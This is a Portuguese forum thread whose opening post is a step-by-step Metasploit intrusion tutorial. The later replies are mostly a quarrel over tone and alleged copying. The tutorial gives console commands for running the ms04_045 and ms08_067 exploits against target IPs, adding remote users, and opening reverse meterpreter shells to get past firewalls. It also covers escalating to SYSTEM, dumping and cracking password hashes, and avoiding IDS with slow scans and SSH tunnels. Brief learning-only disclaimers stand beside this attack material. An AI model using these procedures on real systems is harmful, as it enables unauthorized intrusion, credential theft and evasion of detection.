• Revista PROGRAMAR: Já está disponível a edição #56 da revista programar. Faz já o download aqui!

herakty

Tutorial detalhado em guia prático do Metasploit. Indespensável.

35 mensagens neste tópico

O Metasploit é um framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits.

Os meus maiores agradecimentos ao H.D. Moore e sua equipe por tornarem um sonho realidade

Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele. Lembrando que este tutorial só tem o objectivo de aprendizagem, cada um é responsável pelos seus actos.

De qualquer forma, e devido a certos requesitos dos testes de intrusão deverão usar sempre proxy a não ser que usem um Lab com VM´s

proxy.png

Uma das coisas que hoje já existe no metasploit é uma interface gráfica via browser que simplifica o processo, apesar de aconselhar a usarem o cliente tipo linha de comandos (msfcl)

A interface gráfica é o msfweb - Interface gráfica via browser

Vou usar o linux mas há também a versão para windows. Então levando em consideração que tenham instalado no vosso PC e está a funcionar, vamos dar uma vista sobre a utilização desta SUPER PODEROSA FERRAMENTA... um sonho tornado realidade... para mim que ainda me lembro quando para fazer isto era preciso dezenas de tools e procedimentos... agora tá tudo integrado numa plataforma/framework.

Vou também ter o cuidado de usar vulnerabilidades antigas e exploits ultrapassados para que não possa ser usado como guia total para um ataque, visto cobrir todo o percurso de exploitation. Mas basta seleccionar outros exploits para as novas coisinhas... ;)

Vejam também a, digamos, o irmão web que é a excelente w3af "Web Application Attack and Audit Framework."

Apesar do metasploit também estar preparado para ataques web, mas eu especializei-me nos dois e é melhor trabalhar com as duas em conjunto.

O metasploit possui várias ferramentas dentre elas: (e muitas mais para vocês explorarem... explorem os payloads, os exploits e todos os outros utilitários. Podem fazer-lo lendo ou explorando nos ficheiros ou com comandos do tipo "show payloads" ou "show exploits", entre outros.)

msfconsole - metasploit em modo console

msfcli - interface de automatização de penetração e exploração

msflogdump - exibe sessões de arquivos de log

msfplayload - usado para gerar payloads customizados

msfpescan - utilizado para analisar e descompilar executáveis e DLLs

msfencode - um codificador interactivo de payload encoder

msfupdate - utilizado para verificar e fazer download de actualização do framework

msfweb - Interface gráfica via browser

Hoje devido ao facto do metasploit estar na Rapid7 podem usar uma versão gratuita do detector de vulnerabilidades automático, o NeXpose Community Edition... ele detecta as vulnerabilidades e integra-se com o metasploit.

Nexpose (Detector de vulnerabilidades)

http://www.rapid7.com/vulnerability-scanner.jsp

Podem, como eu, usar o Nessus para isso ou outras ferramentas... hoje até o nmap têm scripts para detectar vulnerabilidades, que são a principal questão no exploitation... é a partir de uma vulnerabilidade que tudo acontece e precisam saber a versão exacta do software alvo e do SO... em alguns casos no windows até a língua em que o windows esta.

Algo essencial para se escolher o exploit certo é saber o serviço e a versão exacta do mesmo, pois os exploits são feitos nessa base. Para tal e se soubermos já que há uma vulnerabilidade para um apache 2 versão anterior à 2.15, podemos fazer um scan especifico com o Nmap a essa porta (80) para não dar nas vistas. É como se alguem tivesse a aceder ao site, pois apenas são enviados pacotes para a porta 80. Se fizerem um scan a todas as portas e houver algum equipamento de jeito no caminho vai detectar que é um scan e corta. Saibam o que procurar e não façam scans a todas as portas, a não ser que não haja qualquer equipamento especial, como acontece na maioria dos datacenters para as contas mais baixas. As mais usadas.

Nmap –sT –P0 –A –version-all –T0 –p 80 ipalvo

(o –T0 é para que haja maior espaço de tempo entre o envio de pacotes, para dificultar a detecção. Mas não é uma técnica de evasão e pode ser dispensado. O Nmap têm diversas técnicas de evasão, como spoofing, etc... explorem a documentação)

Nessus (Detector de vulnerabilidades)

http://www.nessus.org/nessus/

O Nessus é um motor que interpreta scripts em NASL (ver artigo meu na 3ª Edição - Julho de 2006 que explica melhor esta linguagem) e envia-os contra um ou mais alvos, fazendo um relatório dos resultados. Estes scripts procurar milhares de vulnerabilidades, mas apensa as conhecidas. Podem desenvolver os vossos próprios scripts NASL para coisas novas.

Voltando ao Metasploit, eu vou ensinar aqui a utilizar somente três destas ferramentas(msfconsole, msfcli, msfweb), pois acredito que um verdadeiro :smoke: aprenderá sozinho o restante... como sempre dou a base para futuras explorações. Ajuda ao ensino e evita script kiddies

msfconsole:

Primeiramente digita-se na linha de comando :

[root]#./msfconsole

se for no windows só digite msfconsole sem ./, continuando deverá aparecer algo como: (neste caso já foi usado o comando “show exploits” para se ter uma lista dos exploits. O comando show serve para outras coisas como payloads e opções. Ver em detalhe)

metasploit.gif

Para quem dá o primeiro passo pode executar o comando “help” para ver os comandos de consola. Atenção que isto são apenas os comandos de consola e não todas as suas funcionalidades.

thumb_metasploit_parte4b.jpg

Como vimos na primeira imagem do mestasploit e a nivel formativo, pois no mundo a sério já saberão que exploit usar, será: show [opção] (a opção poderá ser uma das que vos aparecerão senão digitarem nenhuma, como podem ver no exemplo em seguida

desta forma:

msf > show
msfconsole: show: requires an option: 'exploits', 'payloads', 'encoders', or 'nops'
msf >

Viram que apareceram as opções deste comando. O mesmo acontece com outros comandos, pois podem ir assim explorando a framework.

Para saberem quais os exploits que existem nesta framework (desde a ultima actualização, devem ir actualizando o metasploit que está em constante evolução) basta digitar o comando:

msf >show exploits; 

metasploit.gif

Para saber os payloads que existem neste framework basta digitar o comando: show payloads e assim por diante.

Então dentro do ambiente do metasploit escolhemos o exploit assim com o comando “use”:

metasploit_ie_xp_pfv_metafile.png

msf > use wins_ms04_045
msf wins_ms04_045 >

viram que eu escolhi o wins_ms04_045 e o prompt mudou . Utilizando para isto o comando: use

continuando...

Digitamos o nosso velho amigo : show , novamente para verificar quais atributos ele aceita . Vejamos:

msf wins_ms04_045 > show
msfconsole: show: specify 'targets', 'payloads', 'options', or 'advanced'
msf wins_ms04_045 >

Vimos aqui que ele aceita targets, payloads, options ou advanced.

Vamos verificar quais opções que este exploit já seleccionado aceita:

msf wins_ms04_045 > show options

Exploit Options
===============

Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 42 The target port

Target: Target Not Specified

msf wins_ms04_045 >

Este exploit aceita somente duas opções : o ip alvo e a porta alvo. 

Agora deves estar a perguntar... como faço para utilizar isto. Simples, basta configurar o que o exploit aceita (há diferenças entre exploits e cada vez mais, pois mais complexidade e vectores são adicionados, diferenciando cada vez mais os exploits), lembrando que onde estiver escrito required, significa que estas opções tem que ser configuradas obrigatoriamente para o exploit funcionar. Continuando...

Façamos assim:

msf wins_ms04_045 > set RHOST 200.126.35.34
RHOST -> 200.126.35.34
msf wins_ms04_04>

msf wins_ms04_045 > set RPORT 42
RPORT -> 42
msf wins_ms04_045 >

Vejam que utilizei a mesma porta que o valor por default...

Agora teremos que seleccionar o payload para o nosso exploit. O payload nada mais é que um software acoplado ao exploit para fazer as mais variadas tarefas.

Digitamos então o comando para saber os payloads suportados pelo nosso exploit: show payloads

msf wins_ms04_045 > show payloads

Metasploit Framework Usable Payloads
====================================

win32_adduser Windows Execute net user /ADD
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_ord Windows Staged Reverse Ordinal Shell
win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

msf wins_ms04_045 >

Eu vou escolher o primeiro payload, que faz com que seja adicionado remotamente um utilizador no sistema windows (como tenho dito tanto sobre os payloads, hoje já há payloads para tudo e todos os SO´s… até uma shell especial para cracking que é o meterpreter) :cheesygrin:

O meterpreter é um complexo payload que é uma espécia de shell especial para cracking, com funcionalidades especificas para isso. Algo que já falei bastante também.

Documento onde é detalhado técnicamente o meterpreter:

http://www.nologin.org/Downloads/Papers/meterpreter.pdf

Caso queiram usar o meterpreter, na selecção do payload, escolham um com meterpreter, como por exemplo win32_reverse_meterpreter... isto vai criar uma sessão no alvo, com o meterpreter e como é reverse passa pelas firewalls, pois estas pensam que como vem de dentro da rede é confiável.

Assim:

msf wins_ms04_045 > set PAYLOAD win32_adduser jolie
PAYLOAD win32_adduser -> jolie
msf wins_ms04_045>

Vamos agora listar os sistemas operativos que serão os alvos: Utilizando o velho comando : show, só que agora assim: show targets

msf wins_ms04_045 > show targets

Supported Exploit Targets
=========================

0 Windows 2000 English

msf wins_ms04_045 >

Só temos uma opcao aqui, somente o windows 2000 em ingles é vulneravel, mas tudo bem...

msf wins_ms04_045 > set TARGET 0
TARGET -> 0
msf wins_ms04_045 >

tamos mesmo, mesmo, mesmo a um tirinho de caçadeira... valeu a pena chegar aqui... pois agora apenas falta uma coisa para completar nossa tarefa... Executar o nosso exploit, que é mais um pacote exploit (conjunto de várias coisas que antigamente se faziam em separado e com muito trabalho) do que somente um exploit.

Digite somente: exploit (lindo não? Isto é “disparar” o exploit em direcção ao alvo. ATENÇÃO. Só usar alvos virutais ou máquinas voças

msf wins_ms04_045 > exploit

E pronto...Acabamos a nossa primeira etapa, agora vamos passar para o msfcli.

O msfcli é utilizado para poder fazer tudo de uma só vez. Nao precisando do passo a passo descrito acima. Se nós ja conhecemos o exploit isto agiliza

muito o nosso trabalho na linha de comando digitamos assim:

 [root]#./msfcli wins_ms04_045 RHOST =200.156.23.25 RPORT=42 PAYLOAD=win32_adduser teste TARGET=0 E

e vejam que faz a mesma coisa que no modo console.

Caso o exploit se direcione a um serviço sem previlégios especiais pode-se usar um exploit local para escalar previlégios ou os seguintes comandos do meterpreter. Atenção que neste caso terão de estar a usar o meterpreter (para isso terão na altura de selecção do payload escolher um especial com o meterpreter, como por exemplo win32_reverse_meterpreter)

E na sessão do meterpreter usem os scripts já existentes para isso, como apresento em baixo.

meterpreter> use priv
meterpreter> getsystem

Mais coisas interessantes que se podem fazer com o meterpreter em conjunto com outras ferrametas geniáis, como o LophtCrack ou o Cain e Abel para crackar hashes de passwords.

Has passwords estão codificadas mas podem ser “sacadas” e posteriormente crackadas... garanto que conseguirão algumas que não sejam muito fortes, o que é muito normal.

Por exemplo. Como fazer o dump das hashes das passowrds com o meterpreter e fazer o download para depois as crackarem com algum dos programas anteriormente mencionados.

.MSFConsole
> use windows/smb/ms08_067_netapi
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST (meu Ip)
> set RHOST (Ip Remoto)
> exploit
> getuid
> hashdump
> use -f cmd -c

Para fazer downloads ou uploads dentro do meterpreter, entre o vosso PC e o alvo comprometido.

meterpreter> download arquivo1 arquivo2 pastaDestino
meterpreter> upload arquivo1 arquivo2 pastaDestino

Para crackar as hashes eu uso o LOphtCrack. É só guardar o resultado do "hashdump" num .txt (meuHash.txt) e usa-lo no LOphtCrack. Garanto que terão algumas passwords interessantes.

(investiguem também a familia Pwdump... muito interessante para certas situações.)

pwdump is the name of various Windows programs that output the LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM). In order to work, it must be run under an Administrator account, or be able to access an Administrator account on the computer where the hashes are to be dumped; so Pwdump does not compromise security. Most of these programs are open-source.

http://en.wikipedia.org/wiki/Pwdump (aqui são explicadas as várias “cores” e “sabores” e seus links)

Vamos passar para uma forma ainda mais fácil. Garanto que o ppl mais windows vão adorar esta forma, que é um GUI (Grafical User Interface... mas no mundo dos exploits? Sim... vejam)

Trata-se da ferramenta msfweb que quando executado permite fazermos tudo por uma pagina web, todas as funcionalidades aplicaveis estão lá.

Para acederem ao GUI do metasploit façam:

 [root]#./msfweb
+----=[ Metasploit Framework Web Interface (ip:55555) 

Deixar correr... Abrir em seguida o browser e digitar o url: teu ip, localhost, 127.0.0.1... Mais a porta 55555

Seria assim: http://localhost:55555

E assim verão a magia desta ferramenta. Um rico GUI onde facilmente qualquer um pode configurar uma sessão completa, sem digitar comandos em consolas. Claro que no alvo vão (ou não) usar a consola, pois é mais...

Poderemos com isto fazer tudo graficamente sem digitar comandos etc etc, somente seleccionando.

Para complementar e devido a essas novas IPS e IDS que detectam padrões de tráfego e podem ser actualizadas com as assinaturas dos novos exploits, aqui fica um extra dedicado às novas appliances PANDA

Com um tunnel SSH o tráfego vai encriptado e não é possível identificar o mesmo, o que vai dentro dessa sessão.

É uma das mais usadas técnicas de evasão,

Criando uma sessão meterpreter persistente sobre um túnel SSH (integrando com o metasploit)

http://secnow.wordpress.com/2010/04/01/criando-uma-sessao-meterpreter-persistente-a-partir-de-um-tunel-ssh/

Podem ver muitos videos que até já apresentei alguns, com tudo isto em "real" e muito mais... investiguem por ai, pois há magia no ar

teckV

1

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Ouvi dizer que Metasploit só "resulta" até uma determinada distância.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

    Boa noite,

    Define "distância"... O Metaexploit funciona com as exploits que forem feitas para funcionarem na framework Metaexploit, claro que tem as suas limitações, mas doutra forma onde estaria a "fronteria"?

Cordiais cumprimentos

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Ouvi dizer que Metasploit só "resulta" até uma determinada distância.

peço desculpa, mas é difícil responder de forma cordial a um comentário destes, num tutorial que levou horas a fazer e tem um nivel técnico tão avançado, foram apresentados truques e surpresas, que até se pode considerar que fui longe demais... algo que sei está a ser muito útil para muitos... os que entendem o enquadramento do metasploit e estão interessados em saber mais, pois tenho falado extensivamente do metasploit neste fórum... neste forum já há toda a info necessária, em vários vectores para se tirar um excelente partido do metasploit. coisa que acho que é única neste fórum em Portugal e de me orgulho em nome de todos os que colaboram com o seu esforço

começa logo pelo "ouvi dizer"... mas não estamos em tecnologia? na tecnologia existe o "ouvi dizer" para se afirmar algo? na tecnologia ou se sabe o que se diz e do que se fala, ou se pergunta, ou não se diz nada... não existe o parece que isto e aquilo. isso é noutros universos

não entendo o porque de um comentário assim... aceitaria qualquer questão, qualquer que fosse o seu nível técnico... isso seria algo que entenderia e teria o maior prazer em esclarecer

não consigo obviamente responder à afirmação em sei pois é loucura... é algo que está num universo diferente daquele que este tutorial existe e como tal a única coisa a dizer é comentar o porque de tal comentário.

não só não fazer ideia do que se falou aqui, como falas de um forma que muito sinceramente não entendo... não tenho compilador para essa língua... nada faz sentido nessa frase e é com mt pena que vejo um tutorial onde até fui longe demais, para mostrar o mundo da segurança actual e para ajudar aqueles que como eu querem saber destas questões técnicas e para mostrar aos profissionais (e futuros) que há esta realidade e é preciso ter sempre isto em atenção, quer se seja programador ou administrador de sistemas/redes... ou qualquer função nas TI, pois isto envolve tudo.

enfim... como em principio lerão primeiro o tutorial e só depois esse comentário tão... sem sei  o que dizer... é como falar de gajas boas num jogo de futebol (excluindo os intervalos e focando apenas no jogo)... fica-se sem palavras...

porque disseste isso tão sem sentido e num trabalho tão esforçado de outrem? não é do metasploit, de detecção de vulnerabilidades e serviços e exploitation que estamos a falar? porque chamar alhos aos bugalhos?

peço desculpa a todos mas não sei mesmo qual a melhor forma de responder a tal afirmação... ;)

foi com grande esforço que não segui um caminho menos honroso, pois havia muita matéria na afirmação para...

e como o apocstantos se confundiu também eu fiquei com essa da "distancia"... podes reescrever a tua posição de um forma que faça sentido técnico? ou não digas nada para não se estragar este trabalho... quem sabe do que se falou sabe interpretar a tua afirmação e nem sequer gastar um neurónio com ela.

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Dude, em primeiro lugar eu não disse que era expert nesta matéria (segurança), muito pelo contrário. Apenas coloquei uma questão, se levaste a mal peço imensa desculpa por te ter feito perder tempo a escrever um post tão bem estruturado como o teu.

Quando falei em distância falei precisamente nisso, é possível conseguires acesso se estiveres em Portugal e o computador "alvo" estiver noutro lado do Mundo?

Depois, qual é o mal de dizer "Ouvi dizer"? Epá nós todos já sabemos como tu és bom em tecnologia e como dominas tudo o que esteja relacionado com isso mas calma, nem todos se interessam por todas as áreas. Apenas coloquei uma questão mas já vi que tu és uma pessoa conflituosa, isto pode ser provado por posts teus, não é preciso pesquisar muito.

Obrigado pela atenção, herakty.

p.s. Já sabemos que conheces o caps lock, o enter e que sabes usar bbcode, não é preciso exagerares.  ;)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

desculpa...mas qual é a parte do conceito de "Internet" que te esta a escapar....

Se tiveres do outro lado do mundo não consegues aceder aqui ao forum????

bom... se estiveres na china ou algum pais desses é um pouco mais dificil.... não consegues chegar ao google por exemplo... mas isso tambem resolve-se com um proxy.

A partir do momento que consegues chegar a uma rede, esta pode ser alvo do metasploit.

Agora... sim podes ter problemas de distancia...

por exemplo estares fora do limite da rede wifi a que estas ligado... ou teres um cabo de rede com 10 metros e a tomada estar 15... ai vais ter que te chegar um pouco mais perto...

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Dude, em primeiro lugar eu não disse que era expert nesta matéria (segurança), muito pelo contrário. Apenas coloquei uma questão, se levaste a mal peço imensa desculpa por te ter feito perder tempo a escrever um post tão bem estruturado como o teu.

Quando falei em distância falei precisamente nisso, é possível conseguires acesso se estiveres em Portugal e o computador "alvo" estiver noutro lado do Mundo?

Depois, qual é o mal de dizer "Ouvi dizer"? Epá nós todos já sabemos como tu és bom em tecnologia e como dominas tudo o que esteja relacionado com isso mas calma, nem todos se interessam por todas as áreas. Apenas coloquei uma questão mas já vi que tu és uma pessoa conflituosa, isto pode ser provado por posts teus, não é preciso pesquisar muito.

Obrigado pela atenção, herakty.

tu não colocas-te uma questão... fizeste uma afirmação e ainda por cima dizendo que "ouviste dizer", que baralha algumas pessoas... sei o que te digo porque mts me colocam questões por PM e fico a par das duvidas das pessoas

e deixa de ouvir quem te disse isso, pois ou está a gozar contigo ou não tem nada para te ensinar  :down:

mas o que me chateou foi isso estar num tutorial e sabes porque ainda me chateou mais? porque eu era para seguir em formato tutorial, isto é, eu era para continuar este tutorial com uma série de respostas minhas com novas cenas INTERESSANTES do metasploit... e isso morreu

a questão é.... como é que alguém posta alguma coisa num tutorial sobre o metasploit senão entende o mínimo dos mínimos? não estou a ser ofensivo, mas realista... acho que qualquer miúda adolescente sabe que na Internet não há "DISTANCIA"

fiquei sem palavras e apenas escrevi o que me veio à cabeça, tentando não explodir... é que à outras secções, outros tópicos para esse tipo de questões (bem... essa nem sei se realmente há, mas podias sempre colocar numa área de redes ou algo assim, pois as tuas duvidas estão relacionadas com redes e não com o metasploit)

eu sei que não te apercebeste... mas foi muito... nem sei como dizer de uma forma "educada", pois isso nunca seria para se colocar na secção de segurança, quanto mais num tutorial sobre o metasploit

é isso... tenta entender a minha posição, pois eu tento entender a tua

vou ter que fazer uma adaptação e mudar este tópico e criar um novo para fazer isto... é por estas questões que acho que um fórum não é o melhor lugar para ensinar e se deveria ter seguido o caminho do Moodle (sistema de e-learning muito bom onde se pode organizar bem as coisas, como cursos e podem colocar questões (que não foi o teu caso... tu afirmaste uma coisa que não fazia sentido nenhum... é de um nível que nem sei classificar, como podes ver na resposta do killercode que demonstrou que nem sequer fazes ideia daquilo que... e não digo mais nada porque não vejo como falar disso sem ser ofensivo... o que não fui... sou mesmo complexo e por acaso tive mt calma a responder, como de certeza as pessoas que me conhecem daqui devem ter pensado, pois quando expludo é... e ainda agora estou a evitar ser ofensivo, o que é difícil

eu quero criar um tutorial, que terá obviamente ser feito em partes, não só porque o metasploit é infinito (porque é modular e estão sempre a acrescentar coisas e permite scripts como poderás ver num tópico que vou criar... isto torna-o sem limites)

mas tá-se bem... nao sou assim como pensas... foi foi muito frustante ver a 1º resposta a este tuturial, mas como te disse eu tento entender-te...

mas evita para a próxima, pois há outras secções e quando é assim o que o ppl faz é criar um tópico de pergunta... crias um tópico a perguntar o que seja... é que este perdeu o BRILHO que deveria ter... mas vou recuperar isso e ta-se bem

espero que o staff actual entenda isso e não crie problemas a eu criar um tutorial só com apresentações do metasploit e como o usar... .as questões coloque-nas como fazem todos os outros... ainda por cima quando há tantos tópicos a falar do meta tinha de ser logo no tutorial

mas ta-se bem... tens é ainda um longo caminho, mas eu apoio-te e espero que te motives a aprender... é apenas isso... nas TI todos nós estamos sempre a aprender... se alguém te disser que não tem nada a aprender nas TI tá-se a mentir  :hmm:

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

@herakty, não percebeste a minha posição e realmente olhando agora para o meu post acho que não me expliquei bem. Ninguém me disse nada, aquilo foi uma mera força de expressão. O que eu realmente estava a tentar dizer é que já tentei funcar o metasploit numa máquina velha que tenho aqui e que consegui encontrar uma vulnerabilidade e rodar lá o exploit. Quando isso aconteceu apareceu algo como isto (já não me lembro muito bem): "Exploit completed but no session has been created". Não foi exactamente isto mas foi idêntico. Daí a minha questão, eu procurei sobre isso e encontrei em forúns do metasploit um coment a dizer o que referi no meu 1º post neste tópico. Não vamos poluir mais o tópico, se quiseres falámos por PM e eu explico-te a situação.

edit: Deixo aqui um link com um problema igual ao meu: http://www.metasploit.com/redmine/issues/433, eu vou tentar encontrar aquele coment que fizeram quando postaram algo parecido com isto, só para esclarecer tudo!

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Esse tutorial é muito parecido com este : http://invasao.informe.com/tutorial-metasploit-dt13.html

parecido? ou tem coisas em comum como é óbvio, pois estamos a falar do mesmo?

oi que mais comprova o que é dito

mas onde vês a parte de identificação de serviços com o nmap?

nesse onde vês o escalar de privilégios?

nesse onde vês o sacar as passwords e a explicação de como as crackar?

o meu é muito mais explicativo e completo e começa logo a explicar os proxys

acho ridiculo esse comentário, pois se eu estou a falar do metasploit, em português e com tudo explicadinho, É ÓBVIO QUE EXISTAM PONTOS EM COMUM POIS A FORMA DE EXPLOITATION É SEMPRE IGUAL... ENTENDES ISSO?

realmente fico mt animado com este tipo de comentários de pessoas que não contribuem desta forma

sabes quanto tempo demorei a fazer e quantas pessoas agradeceram?

eu sei que não entendes nada deste mundo e viste uma ou outra coisa igual (o QUE É ÓBVIO E VAI VER EM MUITOS MAIS... SENÃO FOSSE ASSIM EU ESTARIA A MOSTRAR COISAS ERRADAS) e pensas que um gajo copia

amigo... eu tou farto de postar coisas de outros e deixo bem claro os créditos...

não tenho nada a provar, contrariamente a outras pessoas que TEM TUDO A PROVAR, pois o que se vê... é UM GRANDE NADA

AGRADEÇO OS VOSSOS ANIMADORES COMENTÁRIOS

um tutorial completo, deste o uso de proxys, à identificação de serviços com o nmap explicada, com a explicação do reverse_tcp, com o escalar de privilégios mesmo que um serviço corra numa conta sem privilégios, o sacar das hashes de passwords e a explicação e apresentação dos programas que as crackam e os vários pwdumps... da-se, nada a ver como o que tu mostras

agora o processo de exploitar e adicionar user é BÁSICO e SEMPRE USADO... ENCONTRAS ISSO EM MUITOS MAIS... nem sei porque escolhestes esse

mas olha... faz então tu um, porque há aqui pessoas mt interessadas nesta matéria e FICARIAM MT AGRADECIDOS SE TU CONTRIBUISSES COM A TUA SABEDORIA EM PROGRAMAÇÃO EM MySQL E CSS, COM OS TEUS CONHECIMENTOS EM PHOTOSHOP E FIZESSES UM TUTORIAL SOBRE O META

fico à espera do teu MELHOR contributo...

e já agora... faz também sobre tudo o que eu tenho falado do metasploit, como scripting, manter acesso constante e tudo mais que tenho mostrado... como identificar os nossos proprios proxys e tudo mais

é que eu pensei que ter tornado o portugal-a-programar no melhor local de segurança informática nacional seria algo bastante interessante e um agradecimento ficaria mt melhor

a serio... passo-me mesmo, pois tenho contribuído tanto para esta secção deste QUE A CRIEI... sim... não havia nada... e sem duvida que sou quem mais contribui... sou obrigado a dizer isto, tendo em conta as insinuações constantes de certas pessoas que SÃO PROGRAMADORES DE MYSQL E CSS

(claro que é para rir mas ele diz que é...lol... não sabe o que é uma linguagem de programação mas sabe criticar em segurança... lol)

mas então quem vai contribuir com mais um tutorial sobre metasploit? eu estava a criar um tópico com tudo organizado que está espalhado em vários tópicos meus... mas já que não estou à altura alguém que o faça por mim...

mas que fique claro que qualquer semelhança é uma coincidência e que é normal um gajo usar imagens de outros lados e até blocos, pois eu vou à documentação do metasploit... não a blogs, para ser mais rápido

mas ninguém fazia um tutorial assim senão dominasse o tema

e já está estragado o trabalho... ganharam

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

@herakty, não me tiraste a dúvida que coloquei no meu último post.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

@herakty,

Não existe problema em tirar partes de outro tutorial, mas não peças pra te aplaudirem sempre que escreves alguma coisa.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

@herakty,

Não existe problema em tirar partes de outro tutorial, mas não peças pra te aplaudirem sempre que escreves alguma coisa.

Yoda, penso que estás a ser um pouco aborrecido... tipo, por mais que um artigo esteja excelente e quem não gostar a meu ver não devia comentar... O tutorial está muito bom e tem a informação muito bem organizada, isto é o que precisamos. Como é óbvio temos de recorrer a meios de informação para formar um artigo. Em qualquer livro, relatório tens uma bibliografia; não queres que se faça algo assim do nada? as coisas não caem do céu...

Bom tuto  :D

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

@vulcano,

Quando existem citações normalmente faz-se referência, e é bom dar crédito a essas pessoas.

Não se trata de perseguição, fui pesquisar mais sobre tutoriais sobre metasploit e encontrei aquele por acaso.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Quando existem citações normalmente faz-se referência, e é bom dar crédito a essas pessoas.

Não se trata de perseguição, fui pesquisar mais sobre tutoriais sobre metasploit e encontrei aquele por acaso.

que belo trabalho em estragar um tutorial... os meus parabéns  :D:P

já se fala de tudo menos do metasploit tecnicamente... o normal para quando não se entende do assunto

e agora umas perguntas

que valor acrescentando ao fórum como um todo, sim, deveríamos ser um fórum em comum e não uma série de gajos desalinhados, perguntava que valor acrescentado trouxe esse comentário? beneficiou em alguma coisa o fórum?

que interesse têm um membro de um fórum em desvalorizar o seu (quer dizer, um fórum não é de ninguém e realmente é o staff mais novo, que não traz conteúdos relevantes e é mais novo cá de quem posta :D que o desvaloriza...

porque acrescentar um comentário desses a um trabalho tão esforçado e que nada teve a ver com "CÓPIAS", mas QUE OBVIAMENTE TENDO EM CONTA QUE HÁ MAIS PESSOAS A FALAR DO MESMO; ALGUMAS COISAS SEJAM IDÊNTICAS... ISSO SÓ MOSTRA QUE ESTAMOS CORRECTOS... se fosse diferente era porque eu tinha errado

como é que pessoas que nada entendem de metasploit e sploitation respondem num tutorial sobre o metasploit? e só para anularem o trabalho, pois uns geraram confusão, outros desvalorizam dizendo que é CRÉDITOS DE OUTROS QUANDO NÃO É

CRÉDITOS DE OUTROS QUANDO NÃO É? se falares de um ferrari e disseres que anda a 320 estás a copiar alguém ou tás a falar do que sabes sobre um ferrari? se os comandos são ESTES É ÓBVIO QUE OUTRAS PESSOAS QUE FALAM DO METASPLOIT TAMBÉM FALAM DELES... ou estávamos errados e não estamos

quantas vezes falei do metasploit e de MUITAS OUTRAS características do mesmo? e se a iniciação ao metasploit se baseia em certos comandos NÃO É OBVIO QUE AJAM VÁRIOS TUTORIAIS A FALAR DESSES MESMOS COMANDOS E FUNCIONALIDADES?

agora, quando alguém não sabe o que dizer tecnicamente só lhe resta fazer esses comentários... enfim

deve ser uma geração especial que nasceu ensinada e não ouve ninguém e sabe tudo... mas estão a ser bem castigados, pois estão a herdar um pais em banca rota... mas isso é outra história... desemprego nos jovens é assustador... mas não querem ouvir nada de ninguém pois já sabem tudo (palavras do yoda)

É SEM DUVIDA ALGUMA O LOCAL ONDE MAIS SE FALA DO METASPLOIT EM PORTUGAL E CLARO QUE O POSTADOR É... VEJAM NOS VÁRIOS NICKS E ASSOCIEM OS MESMOS AO METASPLOIT... VERÃO QUE É SEMPRE O MESMO  :smoke: :) :biggrin: :D :-[

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

@herakty, importas-te de responder à minha pergunta para este assunto ficar esclarecido?

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
@herakty, importas-te de responder à minha pergunta para este assunto ficar esclarecido?
Ouvi dizer que Metasploit só "resulta" até uma determinada distância.

não deveria ser no tutorial... deverias colocar essa questão num tópico como te disse e de redes... é esta a questão não é? a distancia?

se não for esta diz qual é que eu respondo... não tenho problemas em responder, fiquei foi chateado pois tinha em mente fazer um grande tutorial... mas ok

olha... sobre a distancia é assim... nas redes, particularmente no TCP/IP (se é que se pode assim designar, pois também há UDP) não há distancia... há routing

um pacote é enviado como uma carta para uma morada, seja ela onde for, basta que hajam na morada destino serviços de correio... o IP/PORTA são a morada e o numero da porta destino da carta e assim é com os pacotes

onde quer que haja Internet, TCP/IP, qualquer coisa que funcione sobre TCP/IP pode lá chegar

se tiveres um alvo em Marte e tiveres uma ligação TCP/IP (eu sei que há :D) podes ataca-lo com o metasploit nas boas, pois o metasploit usa a Internet e seus serviços de routing para chegar onde quer que haja uma conexão... mesmo que seja em Marte

acho que respondi... mas deverias começar por entender o que é a Internet e o TCP/IP, e isto é na boa fé... é o que eu aconselho aos meus amigos e aos que se aproximam de mim para adquirem grandes conhecimentos

uma caminhada de mil KM começa com um passo...  :) força nisso e estuda sempre... agora quando sair vou ter de ler um grande livro sobre C# 4 e .Net 4 para me manter actualizado... isto vai ser assim até morrer

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

